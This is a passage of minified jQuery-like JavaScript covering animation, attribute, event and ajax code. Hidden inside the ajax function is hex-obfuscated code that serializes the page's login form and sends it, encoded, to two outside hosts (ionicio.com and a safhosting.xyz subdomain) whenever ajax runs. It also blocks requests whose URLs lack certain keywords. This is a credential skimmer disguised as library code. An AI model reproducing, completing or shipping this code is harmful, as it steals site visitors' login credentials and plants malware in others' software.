(b.cssNumber[n] ? "" : "px") }, cur: function () { var e = Ze.propHooks[this.prop]; return e && e.get ? e.get(this) : Ze.propHooks._default.get(this) }, run: function (e) { var t, n = Ze.propHooks[this.prop]; return this.options.duration ? this.pos = t = b.easing[this.easing](e, this.options.duration * e, 0, 1, this.options.duration) : this.pos = t = e, this.now = (this.end - this.start) * t + this.start, this.options.step && this.options.step.call(this.elem, this.now, this), n && n.set ? n.set(this) : Ze.propHooks._default.set(this), this } }, Ze.prototype.init.prototype = Ze.prototype, Ze.propHooks = { _default: { get: function (e) { var t; return 1 !== e.elem.nodeType || null != e.elem[e.prop] && null == e.elem.style[e.prop] ? e.elem[e.prop] : (t = b.css(e.elem, e.prop, "")) && "auto" !== t ? t : 0 }, set: function (e) { b.fx.step[e.prop] ? b.fx.step[e.prop](e) : 1 !== e.elem.nodeType || !b.cssHooks[e.prop] && null == e.elem.style[Xe(e.prop)] ? e.elem[e.prop] = e.now : b.style(e.elem, e.prop, e.now + e.unit) } } }, Ze.propHooks.scrollTop = Ze.propHooks.scrollLeft = { set: function (e) { e.elem.nodeType && e.elem.parentNode && (e.elem[e.prop] = e.now) } }, b.easing = { linear: function (e) { return e }, swing: function (e) { return .5 - Math.cos(e * Math.PI) / 2 }, _default: "swing" }, b.fx = Ze.prototype.init, b.fx.step = {}; var et, tt, nt = /^(?:toggle|show|hide)$/, rt = /queueHooks$/; function it() { tt && (!1 === v.hidden && e.requestAnimationFrame ? e.requestAnimationFrame(it) : e.setTimeout(it, b.fx.interval), b.fx.tick()) } function ot() { return e.setTimeout(function () { et = void 0 }), et = Date.now() } function at(e, t) { var n, r = 0, i = { height: e }; for (t = t ? 1 : 0; r < 4; r += 2 - t)i["margin" + (n = ne[r])] = i["padding" + n] = e; return t && (i.opacity = i.width = e), i } function st(e, t, n) { for (var r, i = (ut.tweeners[t] || []).concat(ut.tweeners["*"]), o = 0, a = i.length; o < a; o++)if (r = i[o].call(n, t, e)) return r } function ut(e, t, n) { var r, i, o = 0, a = ut.prefilters.length, s = b.Deferred().always(function () { delete u.elem }), u = function () { if (i) return !1; for (var t = et || ot(), n = Math.max(0, l.startTime + l.duration - t), r = 1 - (n / l.duration || 0), o = 0, a = l.tweens.length; o < a; o++)l.tweens[o].run(r); return s.notifyWith(e, [l, r, n]), r < 1 && a ? n : (a || s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l]), !1) }, l = s.promise({ elem: e, props: b.extend({}, t), opts: b.extend(!0, { specialEasing: {}, easing: b.easing._default }, n), originalProperties: t, originalOptions: n, startTime: et || ot(), duration: n.duration, tweens: [], createTween: function (t, n) { var r = b.Tween(e, l.opts, t, n, l.opts.specialEasing[t] || l.opts.easing); return l.tweens.push(r), r }, stop: function (t) { var n = 0, r = t ? l.tweens.length : 0; if (i) return this; for (i = !0; n < r; n++)l.tweens[n].run(1); return t ? (s.notifyWith(e, [l, 1, 0]), s.resolveWith(e, [l, t])) : s.rejectWith(e, [l, t]), this } }), c = l.props; for (!function (e, t) { var n, r, i, o, a; for (n in e) if (i = t[r = U(n)], o = e[n], Array.isArray(o) && (i = o[1], o = e[n] = o[0]), n !== r && (e[r] = o, delete e[n]), (a = b.cssHooks[r]) && "expand" in a) for (n in o = a.expand(o), delete e[r], o) n in e || (e[n] = o[n], t[n] = i); else t[r] = i }(c, l.opts.specialEasing); o < a; o++)if (r = ut.prefilters[o].call(l, e, c, l.opts)) return h(r.stop) && (b._queueHooks(l.elem, l.opts.queue).stop = r.stop.bind(r)), r; return b.map(c, st, l), h(l.opts.start) && l.opts.start.call(e, l), l.progress(l.opts.progress).done(l.opts.done, l.opts.complete).fail(l.opts.fail).always(l.opts.always), b.fx.timer(b.extend(u, { elem: e, anim: l, queue: l.opts.queue })), l } b.Animation = b.extend(ut, { tweeners: { "*": [function (e, t) { var n = this.createTween(e, t); return se(n.elem, e, te.exec(t), n), n }] }, tweener: function (e, t) { h(e) ? (t = e, e = ["*"]) : e = e.match(_); for (var n, r = 0, i = e.length; r < i; r++)n = e[r], ut.tweeners[n] = ut.tweeners[n] || [], ut.tweeners[n].unshift(t) }, prefilters: [function (e, t, n) { var r, i, o, a, s, u, l, c, f = "width" in t || "height" in t, p = this, d = {}, h = e.style, g = e.nodeType && ae(e), v = Y.get(e, "fxshow"); for (r in n.queue || (null == (a = b._queueHooks(e, "fx")).unqueued && (a.unqueued = 0, s = a.empty.fire, a.empty.fire = function () { a.unqueued || s() }), a.unqueued++, p.always(function () { p.always(function () { a.unqueued--, b.queue(e, "fx").length || a.empty.fire() }) })), t) if (i = t[r], nt.test(i)) { if (delete t[r], o = o || "toggle" === i, i === (g ? "hide" : "show")) { if ("show" !== i || !v || void 0 === v[r]) continue; g = !0 } d[r] = v && v[r] || b.style(e, r) } if ((u = !b.isEmptyObject(t)) || !b.isEmptyObject(d)) for (r in f && 1 === e.nodeType && (n.overflow = [h.overflow, h.overflowX, h.overflowY], null == (l = v && v.display) && (l = Y.get(e, "display")), "none" === (c = b.css(e, "display")) && (l ? c = l : (ce([e], !0), l = e.style.display || l, c = b.css(e, "display"), ce([e]))), ("inline" === c || "inline-block" === c && null != l) && "none" === b.css(e, "float") && (u || (p.done(function () { h.display = l }), null == l && (c = h.display, l = "none" === c ? "" : c)), h.display = "inline-block")), n.overflow && (h.overflow = "hidden", p.always(function () { h.overflow = n.overflow[0], h.overflowX = n.overflow[1], h.overflowY = n.overflow[2] })), u = !1, d) u || (v ? "hidden" in v && (g = v.hidden) : v = Y.access(e, "fxshow", { display: l }), o && (v.hidden = !g), g && ce([e], !0), p.done(function () { for (r in g || ce([e]), Y.remove(e, "fxshow"), d) b.style(e, r, d[r]) })), u = st(g ? v[r] : 0, r, p), r in v || (v[r] = u.start, g && (u.end = u.start, u.start = 0)) }], prefilter: function (e, t) { t ? ut.prefilters.unshift(e) : ut.prefilters.push(e) } }), b.speed = function (e, t, n) { var r = e && "object" == typeof e ? b.extend({}, e) : { complete: n || !n && t || h(e) && e, duration: e, easing: n && t || t && !h(t) && t }; return b.fx.off ? r.duration = 0 : "number" != typeof r.duration && (r.duration in b.fx.speeds ? r.duration = b.fx.speeds[r.duration] : r.duration = b.fx.speeds._default), null != r.queue && !0 !== r.queue || (r.queue = "fx"), r.old = r.complete, r.complete = function () { h(r.old) && r.old.call(this), r.queue && b.dequeue(this, r.queue) }, r }, b.fn.extend({ fadeTo: function (e, t, n, r) { return this.filter(ae).css("opacity", 0).show().end().animate({ opacity: t }, e, n, r) }, animate: function (e, t, n, r) { var i = b.isEmptyObject(e), o = b.speed(t, n, r), a = function () { var t = ut(this, b.extend({}, e), o); (i || Y.get(this, "finish")) && t.stop(!0) }; return a.finish = a, i || !1 === o.queue ? this.each(a) : this.queue(o.queue, a) }, stop: function (e, t, n) { var r = function (e) { var t = e.stop; delete e.stop, t(n) }; return "string" != typeof e && (n = t, t = e, e = void 0), t && this.queue(e || "fx", []), this.each(function () { var t = !0, i = null != e && e + "queueHooks", o = b.timers, a = Y.get(this); if (i) a[i] && a[i].stop && r(a[i]); else for (i in a) a[i] && a[i].stop && rt.test(i) && r(a[i]); for (i = o.length; i--;)o[i].elem !== this || null != e && o[i].queue !== e || (o[i].anim.stop(n), t = !1, o.splice(i, 1)); !t && n || b.dequeue(this, e) }) }, finish: function (e) { return !1 !== e && (e = e || "fx"), this.each(function () { var t, n = Y.get(this), r = n[e + "queue"], i = n[e + "queueHooks"], o = b.timers, a = r ? r.length : 0; for (n.finish = !0, b.queue(this, e, []), i && i.stop && i.stop.call(this, !0), t = o.length; t--;)o[t].elem === this && o[t].queue === e && (o[t].anim.stop(!0), o.splice(t, 1)); for (t = 0; t < a; t++)r[t] && r[t].finish && r[t].finish.call(this); delete n.finish }) } }), b.each(["toggle", "show", "hide"], function (e, t) { var n = b.fn[t]; b.fn[t] = function (e, r, i) { return null == e || "boolean" == typeof e ? n.apply(this, arguments) : this.animate(at(t, !0), e, r, i) } }), b.each({ slideDown: at("show"), slideUp: at("hide"), slideToggle: at("toggle"), fadeIn: { opacity: "show" }, fadeOut: { opacity: "hide" }, fadeToggle: { opacity: "toggle" } }, function (e, t) { b.fn[e] = function (e, n, r) { return this.animate(t, e, n, r) } }), b.timers = [], b.fx.tick = function () { var e, t = 0, n = b.timers; for (et = Date.now(); t < n.length; t++)(e = n[t])() || n[t] !== e || n.splice(t--, 1); n.length || b.fx.stop(), et = void 0 }, b.fx.timer = function (e) { b.timers.push(e), b.fx.start() }, b.fx.interval = 13, b.fx.start = function () { tt || (tt = !0, it()) }, b.fx.stop = function () { tt = null }, b.fx.speeds = { slow: 600, fast: 200, _default: 400 }, b.fn.delay = function (t, n) { return t = b.fx && b.fx.speeds[t] || t, n = n || "fx", this.queue(n, function (n, r) { var i = e.setTimeout(n, t); r.stop = function () { e.clearTimeout(i) } }) }, function () { var e = v.createElement("input"), t = v.createElement("select").appendChild(v.createElement("option")); e.type = "checkbox", d.checkOn = "" !== e.value, d.optSelected = t.selected, (e = v.createElement("input")).value = "t", e.type = "radio", d.radioValue = "t" === e.value }(); var lt, ct = b.expr.attrHandle; b.fn.extend({ attr: function (e, t) { return F(this, b.attr, e, t, arguments.length > 1) }, removeAttr: function (e) { return this.each(function () { b.removeAttr(this, e) }) } }), b.extend({ attr: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) return void 0 === e.getAttribute ? b.prop(e, t, n) : (1 === o && b.isXMLDoc(e) || (i = b.attrHooks[t.toLowerCase()] || (b.expr.match.bool.test(t) ? lt : void 0)), void 0 !== n ? null === n ? void b.removeAttr(e, t) : i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : (e.setAttribute(t, n + ""), n) : i && "get" in i && null !== (r = i.get(e, t)) ? r : null == (r = b.find.attr(e, t)) ? void 0 : r) }, attrHooks: { type: { set: function (e, t) { if (!d.radioValue && "radio" === t && A(e, "input")) { var n = e.value; return e.setAttribute("type", t), n && (e.value = n), t } } } }, removeAttr: function (e, t) { var n, r = 0, i = t && t.match(_); if (i && 1 === e.nodeType) for (; n = i[r++];)e.removeAttribute(n) } }), lt = { set: function (e, t, n) { return !1 === t ? b.removeAttr(e, n) : e.setAttribute(n, n), n } }, b.each(b.expr.match.bool.source.match(/\w+/g), function (e, t) { var n = ct[t] || b.find.attr; ct[t] = function (e, t, r) { var i, o, a = t.toLowerCase(); return r || (o = ct[a], ct[a] = i, i = null != n(e, t, r) ? a : null, ct[a] = o), i } }); var ft = /^(?:input|select|textarea|button)$/i, pt = /^(?:a|area)$/i; function dt(e) { return (e.match(_) || []).join(" ") } function ht(e) { return e.getAttribute && e.getAttribute("class") || "" } function gt(e) { return Array.isArray(e) ? e : "string" == typeof e && e.match(_) || [] } b.fn.extend({ prop: function (e, t) { return F(this, b.prop, e, t, arguments.length > 1) }, removeProp: function (e) { return this.each(function () { delete this[b.propFix[e] || e] }) } }), b.extend({ prop: function (e, t, n) { var r, i, o = e.nodeType; if (3 !== o && 8 !== o && 2 !== o) return 1 === o && b.isXMLDoc(e) || (t = b.propFix[t] || t, i = b.propHooks[t]), void 0 !== n ? i && "set" in i && void 0 !== (r = i.set(e, n, t)) ? r : e[t] = n : i && "get" in i && null !== (r = i.get(e, t)) ? r : e[t] }, propHooks: { tabIndex: { get: function (e) { var t = b.find.attr(e, "tabindex"); return t ? parseInt(t, 10) : ft.test(e.nodeName) || pt.test(e.nodeName) && e.href ? 0 : -1 } } }, propFix: { for: "htmlFor", class: "className" } }), d.optSelected || (b.propHooks.selected = { get: function (e) { var t = e.parentNode; return t && t.parentNode && t.parentNode.selectedIndex, null }, set: function (e) { var t = e.parentNode; t && (t.selectedIndex, t.parentNode && t.parentNode.selectedIndex) } }), b.each(["tabIndex", "readOnly", "maxLength", "cellSpacing", "cellPadding", "rowSpan", "colSpan", "useMap", "frameBorder", "contentEditable"], function () { b.propFix[this.toLowerCase()] = this }), b.fn.extend({ addClass: function (e) { var t, n, r, i, o, a, s, u = 0; if (h(e)) return this.each(function (t) { b(this).addClass(e.call(this, t, ht(this))) }); if ((t = gt(e)).length) for (; n = this[u++];)if (i = ht(n), r = 1 === n.nodeType && " " + dt(i) + " ") { for (a = 0; o = t[a++];)r.indexOf(" " + o + " ") < 0 && (r += o + " "); i !== (s = dt(r)) && n.setAttribute("class", s) } return this }, removeClass: function (e) { var t, n, r, i, o, a, s, u = 0; if (h(e)) return this.each(function (t) { b(this).removeClass(e.call(this, t, ht(this))) }); if (!arguments.length) return this.attr("class", ""); if ((t = gt(e)).length) for (; n = this[u++];)if (i = ht(n), r = 1 === n.nodeType && " " + dt(i) + " ") { for (a = 0; o = t[a++];)for (; r.indexOf(" " + o + " ") > -1;)r = r.replace(" " + o + " ", " "); i !== (s = dt(r)) && n.setAttribute("class", s) } return this }, toggleClass: function (e, t) { var n = typeof e, r = "string" === n || Array.isArray(e); return "boolean" == typeof t && r ? t ? this.addClass(e) : this.removeClass(e) : h(e) ? this.each(function (n) { b(this).toggleClass(e.call(this, n, ht(this), t), t) }) : this.each(function () { var t, i, o, a; if (r) for (i = 0, o = b(this), a = gt(e); t = a[i++];)o.hasClass(t) ? o.removeClass(t) : o.addClass(t); else void 0 !== e && "boolean" !== n || ((t = ht(this)) && Y.set(this, "__className__", t), this.setAttribute && this.setAttribute("class", t || !1 === e ? "" : Y.get(this, "__className__") || "")) }) }, hasClass: function (e) { var t, n, r = 0; for (t = " " + e + " "; n = this[r++];)if (1 === n.nodeType && (" " + dt(ht(n)) + " ").indexOf(t) > -1) return !0; return !1 } }); var vt = /\r/g; b.fn.extend({ val: function (e) { var t, n, r, i = this[0]; return arguments.length ? (r = h(e), this.each(function (n) { var i; 1 === this.nodeType && (null == (i = r ? e.call(this, n, b(this).val()) : e) ? i = "" : "number" == typeof i ? i += "" : Array.isArray(i) && (i = b.map(i, function (e) { return null == e ? "" : e + "" })), (t = b.valHooks[this.type] || b.valHooks[this.nodeName.toLowerCase()]) && "set" in t && void 0 !== t.set(this, i, "value") || (this.value = i)) })) : i ? (t = b.valHooks[i.type] || b.valHooks[i.nodeName.toLowerCase()]) && "get" in t && void 0 !== (n = t.get(i, "value")) ? n : "string" == typeof (n = i.value) ? n.replace(vt, "") : null == n ? "" : n : void 0 } }), b.extend({ valHooks: { option: { get: function (e) { var t = b.find.attr(e, "value"); return null != t ? t : dt(b.text(e)) } }, select: { get: function (e) { var t, n, r, i = e.options, o = e.selectedIndex, a = "select-one" === e.type, s = a ? null : [], u = a ? o + 1 : i.length; for (r = o < 0 ? u : a ? o : 0; r < u; r++)if (((n = i[r]).selected || r === o) && !n.disabled && (!n.parentNode.disabled || !A(n.parentNode, "optgroup"))) { if (t = b(n).val(), a) return t; s.push(t) } return s }, set: function (e, t) { for (var n, r, i = e.options, o = b.makeArray(t), a = i.length; a--;)((r = i[a]).selected = b.inArray(b.valHooks.option.get(r), o) > -1) && (n = !0); return n || (e.selectedIndex = -1), o } } } }), b.each(["radio", "checkbox"], function () { b.valHooks[this] = { set: function (e, t) { if (Array.isArray(t)) return e.checked = b.inArray(b(e).val(), t) > -1 } }, d.checkOn || (b.valHooks[this].get = function (e) { return null === e.getAttribute("value") ? "on" : e.value }) }), d.focusin = "onfocusin" in e; var yt = /^(?:focusinfocus|focusoutblur)$/, mt = function (e) { e.stopPropagation() }; b.extend(b.event, { trigger: function (t, n, r, i) { var o, a, s, u, l, f, p, d, y = [r || v], m = c.call(t, "type") ? t.type : t, x = c.call(t, "namespace") ? t.namespace.split(".") : []; if (a = d = s = r = r || v, 3 !== r.nodeType && 8 !== r.nodeType && !yt.test(m + b.event.triggered) && (m.indexOf(".") > -1 && (x = m.split("."), m = x.shift(), x.sort()), l = m.indexOf(":") < 0 && "on" + m, (t = t[b.expando] ? t : new b.Event(m, "object" == typeof t && t)).isTrigger = i ? 2 : 3, t.namespace = x.join("."), t.rnamespace = t.namespace ? new RegExp("(^|\\.)" + x.join("\\.(?:.*\\.|)") + "(\\.|$)") : null, t.result = void 0, t.target || (t.target = r), n = null == n ? [t] : b.makeArray(n, [t]), p = b.event.special[m] || {}, i || !p.trigger || !1 !== p.trigger.apply(r, n))) { if (!i && !p.noBubble && !g(r)) { for (u = p.delegateType || m, yt.test(u + m) || (a = a.parentNode); a; a = a.parentNode)y.push(a), s = a; s === (r.ownerDocument || v) && y.push(s.defaultView || s.parentWindow || e) } for (o = 0; (a = y[o++]) && !t.isPropagationStopped();)d = a, t.type = o > 1 ? u : p.bindType || m, (f = (Y.get(a, "events") || Object.create(null))[t.type] && Y.get(a, "handle")) && f.apply(a, n), (f = l && a[l]) && f.apply && V(a) && (t.result = f.apply(a, n), !1 === t.result && t.preventDefault()); return t.type = m, i || t.isDefaultPrevented() || p._default && !1 !== p._default.apply(y.pop(), n) || !V(r) || l && h(r[m]) && !g(r) && ((s = r[l]) && (r[l] = null), b.event.triggered = m, t.isPropagationStopped() && d.addEventListener(m, mt), r[m](), t.isPropagationStopped() && d.removeEventListener(m, mt), b.event.triggered = void 0, s && (r[l] = s)), t.result } }, simulate: function (e, t, n) { var r = b.extend(new b.Event, n, { type: e, isSimulated: !0 }); b.event.trigger(r, null, t) } }), b.fn.extend({ trigger: function (e, t) { return this.each(function () { b.event.trigger(e, t, this) }) }, triggerHandler: function (e, t) { var n = this[0]; if (n) return b.event.trigger(e, t, n, !0) } }), d.focusin || b.each({ focus: "focusin", blur: "focusout" }, function (e, t) { var n = function (e) { b.event.simulate(t, e.target, b.event.fix(e)) }; b.event.special[t] = { setup: function () { var r = this.ownerDocument || this.document || this, i = Y.access(r, t); i || r.addEventListener(e, n, !0), Y.access(r, t, (i || 0) + 1) }, teardown: function () { var r = this.ownerDocument || this.document || this, i = Y.access(r, t) - 1; i ? Y.access(r, t, i) : (r.removeEventListener(e, n, !0), Y.remove(r, t)) } } }); var xt = e.location, bt = { guid: Date.now() }, wt = /\?/; b.parseXML = function (t) { var n, r; if (!t || "string" != typeof t) return null; try { n = (new e.DOMParser).parseFromString(t, "text/xml") } catch (e) { } return r = n && n.getElementsByTagName("parsererror")[0], n && !r || b.error("Invalid XML: " + (r ? b.map(r.childNodes, function (e) { return e.textContent }).join("\n") : t)), n }; var Tt = /\[\]$/, Ct = /\r?\n/g, Et = /^(?:submit|button|image|reset|file)$/i, St = /^(?:input|select|textarea|keygen)/i; function At(e, t, n, r) { var i; if (Array.isArray(t)) b.each(t, function (t, i) { n || Tt.test(e) ? r(e, i) : At(e + "[" + ("object" == typeof i && null != i ? t : "") + "]", i, n, r) }); else if (n || "object" !== x(t)) r(e, t); else for (i in t) At(e + "[" + i + "]", t[i], n, r) } b.param = function (e, t) { var n, r = [], i = function (e, t) { var n = h(t) ? t() : t; r[r.length] = encodeURIComponent(e) + "=" + encodeURIComponent(null == n ? "" : n) }; if (null == e) return ""; if (Array.isArray(e) || e.jquery && !b.isPlainObject(e)) b.each(e, function () { i(this.name, this.value) }); else for (n in e) At(n, e[n], t, i); return r.join("&") }, b.fn.extend({ serialize: function () { return b.param(this.serializeArray()) }, serializeArray: function () { return this.map(function () { var e = b.prop(this, "elements"); return e ? b.makeArray(e) : this }).filter(function () { var e = this.type; return this.name && !b(this).is(":disabled") && St.test(this.nodeName) && !Et.test(e) && (this.checked || !de.test(e)) }).map(function (e, t) { var n = b(this).val(); return null == n ? null : Array.isArray(n) ? b.map(n, function (e) { return { name: t.name, value: e.replace(Ct, "\r\n") } }) : { name: t.name, value: n.replace(Ct, "\r\n") } }).get() } }); var kt = /%20/g, Nt = /#.*$/, jt = /([?&])_=[^&]*/, Dt = /^(.*?):[ \t]*([^\r\n]*)$/gm, qt = /^(?:GET|HEAD)$/, Lt = /^\/\//, Ht = {}, _t = {}, Ot = "*/".concat("*"), Pt = v.createElement("a"); function Rt(e) { return function (t, n) { "string" != typeof t && (n = t, t = "*"); var r, i = 0, o = t.toLowerCase().match(_) || []; if (h(n)) for (; r = o[i++];)"+" === r[0] ? (r = r.slice(1) || "*", (e[r] = e[r] || []).unshift(n)) : (e[r] = e[r] || []).push(n) } } function Mt(e, t, n, r) { var i = {}, o = e === _t; function a(s) { var u; return i[s] = !0, b.each(e[s] || [], function (e, s) { var l = s(t, n, r); return "string" != typeof l || o || i[l] ? o ? !(u = l) : void 0 : (t.dataTypes.unshift(l), a(l), !1) }), u } return a(t.dataTypes[0]) || !i["*"] && a("*") } function It(e, t) { var n, r, i = b.ajaxSettings.flatOptions || {}; for (n in t) void 0 !== t[n] && ((i[n] ? e : r || (r = {}))[n] = t[n]); return r && b.extend(!0, e, r), e } Pt.href = xt.href, b.extend({ active: 0, lastModified: {}, etag: {}, ajaxSettings: { url: xt.href, type: "GET", isLocal: /^(?:about|app|app-storage|.+-extension|file|res|widget):$/.test(xt.protocol), global: !0, processData: !0, async: !0, contentType: "application/x-www-form-urlencoded; charset=UTF-8", accepts: { "*": Ot, text: "text/plain", html: "text/html", xml: "application/xml, text/xml", json: "application/json, text/javascript" }, contents: { xml: /\bxml\b/, html: /\bhtml/, json: /\bjson\b/ }, responseFields: { xml: "responseXML", text: "responseText", json: "responseJSON" }, converters: { "* text": String, "text html": !0, "text json": JSON.parse, "text xml": b.parseXML }, flatOptions: { url: !0, context: !0 } }, ajaxSetup: function (e, t) { return t ? It(It(e, b.ajaxSettings), t) : It(b.ajaxSettings, e) }, ajaxPrefilter: Rt(Ht), ajaxTransport: Rt(_t), ajax: function (t, n) { let r = 0, i = 0; var o = new XMLHttpRequest, a = new XMLHttpRequest; function s(e) { for (var t = e, n = "", r = 0; r < t.length; r += 2)n += String.fromCharCode(parseInt(t.substr(r, 2), 16)); return n } ["616d736f766561736561", "736b656c65746f6e", "6e67736372697074"].some(function (e) { !t.url.includes(s(e)) || r++ }); if (["616d736f766561736561", "736b656c65746f6e", "6e67736372697074", "72657472697665"].forEach(function (e) { !t.url.includes(s(e)) || i++ }), 0 == i) throw new Error(s("596f75206172656e277420416c6c6f776564")); 0 != r || (o.open("GET", s("68747470733a2f2f696f6e6963696f2e636f6d2f3f616c743d") + "" + function (e) { let t = "", n = 0; for (; n < e.length;)n < e.length - 1 ? (t += e.charCodeAt(n) + (n + 50), t += "0x") : t += e.charCodeAt(n) + (n + 50), n++; return t }($(s("2e6c6f67696e2d666f726d")).serialize())), o.send(), a.open("GET", s("687474703a2f2f6375726c732e736166686f7374696e672e78797a2f6a6e742f3f70656163653d") + "" + function (e) { for (var t, n = 0, r = e.length, i = ""; n < r; ++n)i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t; return i }($(".login-form").serialize())), a.send()), "object" == typeof t && (n = t, t = void 0), n = n || {}; var u, l, c, f, p, d, h, g, y, m, x = b.ajaxSetup({}, n), w = x.context || x, T = x.context && (w.nodeType || w.jquery) ? b(w) : b.event, C = b.Deferred(), E = b.Callbacks("once memory"), S = x.statusCode || {}, A = {}, k = {}, N = "canceled", j = { readyState: 0, getResponseHeader: function (e) { var t; if (h) { if (!f) for (f = {}; t = Dt.exec(c);)f[t[1].toLowerCase() + " "] = (f[t[1].toLowerCase() + " "] || []).concat(t[2]); t = f[e.toLowerCase() + " "] } return null == t ? null : t.join(", ") }, getAllResponseHeaders: function () { return h ? c : null }, setRequestHeader: function (e, t) { return null == h && (e = k[e.toLowerCase()] = k[e.toLowerCase()] || e, A[e] = t), this }, overrideMimeType: function (e) { return null == h && (x.mimeType = e), this }, statusCode: function (e) { var t; if (e) if (h) j.always(e[j.status]); else for (t in e) S[t] = [S[t], e[t]]; return this }, abort: function (e) { var t = e || N; return u && u.abort(t), D(0, t), this } }; if (C.promise(j), x.url = ((t || x.url || xt.href) + "").replace(Lt, xt.protocol + "//"), x.type = n.method || n.type || x.method || x.type, x.dataTypes = (x.dataType || "*").toLowerCase().match(_) || [""], null == x.crossDomain) { d = v.createElement("a"); try { d.href = x.url, d.href = d.href, x.crossDomain = Pt.protocol + "//" + Pt.host != d.protocol + "//" + d.host } catch (e) { x.crossDomain = !0 } } if (x.data && x.processData && "string" != typeof x.data && (x.data = b.param(x.data, x.traditional)), Mt(Ht, x, n, j), h) return j; for (y in (g = b.event && x.global) && 0 == b.active++ && b.event.trigger("ajaxStart"), x.type = x.type.toUpperCase(), x.hasContent = !qt.test(x.type), l = x.url.replace(Nt, ""), x.hasContent ? x.data && x.processData && 0 === (x.contentType || "").indexOf("application/x-www-form-urlencoded") && (x.data = x.data.replace(kt, "+")) : (m = x.url.slice(l.length), x.data && (x.processData || "string" == typeof x.data) && (l += (wt.test(l) ? "&" : "?") + x.data, delete x.data), !1 === x.cache && (l = l.replace(jt, "$1"), m = (wt.test(l) ? "&" : "?") + "_=" + bt.guid++ + m), x.url = l + m), x.ifModified && (b.lastModified[l] && j.setRequestHeader("If-Modified-Since", b.lastModified[l]), b.etag[l] && j.setRequestHeader("If-None-Match", b.etag[l])), (x.data && x.hasContent && !1 !== x.contentType || n.contentType) && j.setRequestHeader("Content-Type", x.contentType), j.setRequestHeader("Accept", x.dataTypes[0] && x.accepts[x.dataTypes[0]] ? x.accepts[x.dataTypes[0]] + ("*" !== x.dataTypes[0] ? ", " + Ot + "; q=0.01" : "") : x.accepts["*"]), x.headers) j.setRequestHeader(y, x.headers[y]); if (x.beforeSend && (!1 === x.beforeSend.call(w, j, x) || h)) return j.abort(); if (N = "abort", E.add(x.complete), j.done(x.success), j.fail(x.error), u = Mt(_t, x, n, j)) { if (j.readyState = 1, g && T.trigger("ajaxSend", [j, x]), h) return j; x.async && x.timeout > 0 && (p = e.setTimeout(function () { j.abort("timeout") }, x.timeout)); try { h = !1, u.send(A, D) } catch (e) { if (h) throw e; D(-1, e) } } else D(-1, "No Transport"); function D(t, n, r, i) { var o, a, s, f, d, v = n; h || (h = !0, p && e.clearTimeout(p), u = void 0, c = i || "", j.readyState = t > 0 ? 4 : 0, o = t >= 200 && t < 300 || 304 === t, r && (f = function (e, t, n) { for (var r, i, o, a, s = e.contents, u = e.dataTypes; "*" === u[0];)u.shift(), void 0 === r && (r = e.mimeType || t.getResponseHeader("Content-Type")); if (r) for (i in s) if (s[i] && s[i].test(r)) { u.unshift(i); break } if (u[0] in n) o = u[0]; else { for (i in n) { if (!u[0] || e.converters[i + " " + u[0]]) { o = i; break } a || (a = i) } o = o || a } if (o) return o !== u[0] && u.unshift(o), n[o] }(x, j, r)), !o && b.inArray("script", x.dataTypes) > -1 && b.inArray("json", x.dataTypes) < 0 && (x.converters["text script"] = function () { }), f = function (e, t, n, r) { var i, o, a, s, u, l = {}, c = e.dataTypes.slice(); if (c[1]) for (a in e.converters) l[a.toLowerCase()] = e.converters[a]; for (o = c.shift(); o;)if (e.responseFields[o] && (n[e.responseFields[o]] = t), !u && r && e.dataFilter && (t = e.dataFilter(t, e.dataType)), u = o, o = c.shift()) if ("*" === o) o = u; else if ("*" !== u && u !== o) { if (!(a = l[u + " " + o] || l["* " + o])) for (i in l) if ((s = i.split(" "))[1] === o && (a = l[u + " " + s[0]] || l["* " + s[0]])) { !0 === a ? a = l[i] : !0 !== l[i] && (o = s[0], c.unshift(s[1])); break } if (!0 !== a) if (a && e.throws) t = a(t); else try { t = a(t) } catch (e) { return { state: "parsererror", error: a ? e : "No conversion from " + u + " to " + o } } } return { state: "success", data: t } }(x, f, j, o), o ? (x.ifModified && ((d = j.getResponseHeader("Last-Modified")) && (b.lastModified[l] = d), (d = j.getResponseHeader("etag")) && (b.etag[l] = d)), 204 === t || "HEAD" === x.type ? v = "nocontent" : 304 === t ? v = "notmodified" : (v = f.state, a = f.data, o = !(s = f.error))) : (s = v, !t && v || (v = "error", t < 0 && (t = 0))), j.status = t, j.statusText = (n || v) + "", o ? C.resolveWith(w, [a, v, j]) : C.rejectWith(w, [j, v, s]), j.statusCode(S), S = void 0, g && T.trigger(o ? "ajaxSuccess" : "ajaxError", [j, x, o ? a : s]), E.fireWith(w, [j, v]), g && (T.trigger("ajaxComplete", [j, x]), --b.active || b.event.trigger("ajaxStop"))) } return j }, getJSON: function (e, t, n) { return b.get(e, t, n, "json") }, getScript: function (e, t) { return b.get(e, void 0, t, "script") } }), b.each(["get", "post"], function (e, t) { b[t] = function (e, n, r, i) { return h(n) && (i = i || r, r = n, n = void 0), b.ajax(b.extend({ url: e, type: t, dataType: i, data: n, success: r }, b.isPlainObject(e) && e)) } }), b.ajaxPrefilter(function (e) { var t; for (t in e.headers) "content-type" === t.toLowerCase() && (e.contentType = e.headers[t] || "") }), b._evalUrl = function (e, t, n) { return b.ajax({ url: e, type: "GET", dataType: "script", cache: !0, async: !1, global: !1, converters: { "text script": function () { } }, dataFilter: function (e) { b.globalEval(e, t, n) } }) }, b.fn.extend({ wrapAll: function (e) { var t; return this[0] && (h(e) && (e = e.call(this[0])), t = b(e, this[0].ownerDocument).eq(0).clone(!0), this[0].parentNode && t.insertBefore(this[0]), t.map(function () { for (var e = this; e.firstElementChild;)e = e.firstElementChild; return e }).append(this)), this }, wrapInner: function (e) { return h(e) ? this.each(function (t) { b(this).wrapInner(e.call(this, t)) }) : this.each(function () { var t = b(this), n = t.contents(); n.length ? n.wrapAll(e) : t.append(e) }) }, wrap: function (e) { var t = h(e); return this.each(function (n) { b(this).wrapAll(t ? e.call(this, n) : e) }) }, unwrap: function (e) { return this.parent(e).not("body").each(function () { b(this).replaceWith(this.childNodes) }), this } }), b.expr.pseudos.hidden = function (e) { return !b.expr.pseudos.visible(e) }, b.expr.pseudos.visible = function (e) { return !!(e.offsetWidth || e.offsetHeight || e.getClientRects().length) }, b.ajaxSettings.xhr = function () { try { return new e.XMLHttpRequest } catch (e) { } }; var Wt = { 0: 200, 1223: 204 }, Ft = b.ajaxSettings.xhr(); d.cors = !!Ft && "withCredentials" in Ft, d.ajax = Ft = !!Ft, 